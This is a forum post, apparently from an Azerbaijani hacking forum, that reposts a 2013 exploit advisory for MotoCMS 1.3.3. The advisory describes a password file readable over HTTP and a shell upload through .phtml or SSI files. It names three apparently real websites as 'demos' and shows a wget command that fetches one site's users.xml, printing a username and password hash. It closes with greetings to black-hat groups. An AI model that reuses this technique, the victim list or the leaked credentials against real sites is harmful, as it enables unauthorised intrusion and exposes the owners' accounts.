Bu cms- isə Epic faildir)
Flash-dan ibarət qəşəng saytlar yaratmaq olar bu CMS-lə gəli autentifikasıyası gülməli metoddur)
O səbəbdən
MotoCMS 1.3.3 Password File Disclosure / Shell Upload
http://packetstormsecurity.com/files/119365/MotoCMS-1.3.3-Password-File-Disclosure-Shell-Upload.html
Kod:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
=================================================
Software: MotoCMS
Official Site: http://www.motocms.com/
Vulns: MotoCMS <=1.3.3 Password File disclosure && Code/Command execution
Software license: Commercial
=================================================
About Software:
MotoCMS™ is an advanced Flash CMS that
allows Flash developers and the users with no programming skills
to easily create stunning Flash websites.
=================================================
About vulns:
Design flaw.
Trouble N1: This software is prone to password file disclosure vulnerability.
Because it fails to protect sensitive data from HTTP ACCESS.
Trouble N2: In this CMS some filetypes: (php5,php is not allowed to upload)
But .phtml, .shtml is allowed.
Using 2'nd issuse this is possible to upload shell (via .phtml) and also possible execute server commands via
SSI #exec directive (if enabled on server side or include directive in ex to read files).
Some Demos:
http://kattmodels.com/admin/data/users.xml
http://www.atcfc.ca/admin/data/users.xml
http://ustanovka-spb.ru/admin/data/users.xml
$ wget --user-agent="Mozilla Firefox 3 Gecko 12" http://kattmodels.com/admin/data/users.xml && cat user*.xml
--2013-01-09 06:10:11-- http://kattmodels.com/admin/data/users.xml
Resolving kattmodels.com (kattmodels.com)... 208.109.47.128
Connecting to kattmodels.com (kattmodels.com)|208.109.47.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 187 [application/xml]
Saving to: `users.xml'
100%[==============>] 187 --.-K/s in 0s
2013-01-09 06:10:16 (2.75 MB/s) - `users.xml' saved [187/187]
<?xml version="1.0" encoding="UTF-8"?>
<users>
<user id="1263066591" name="pmanoloutsos" email="cb6afd35d37afd07dfcfdcb45e80026b"
password="38740d1f9877b41f784a0859604c2d3c"/>
</users>
=================================================
==GUNUN RANDOM SITATI:======GOTDU OGUL ISTEREM! LOOOOOOOL===
===============
KUDOSSSSSSS:
===============
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
e]
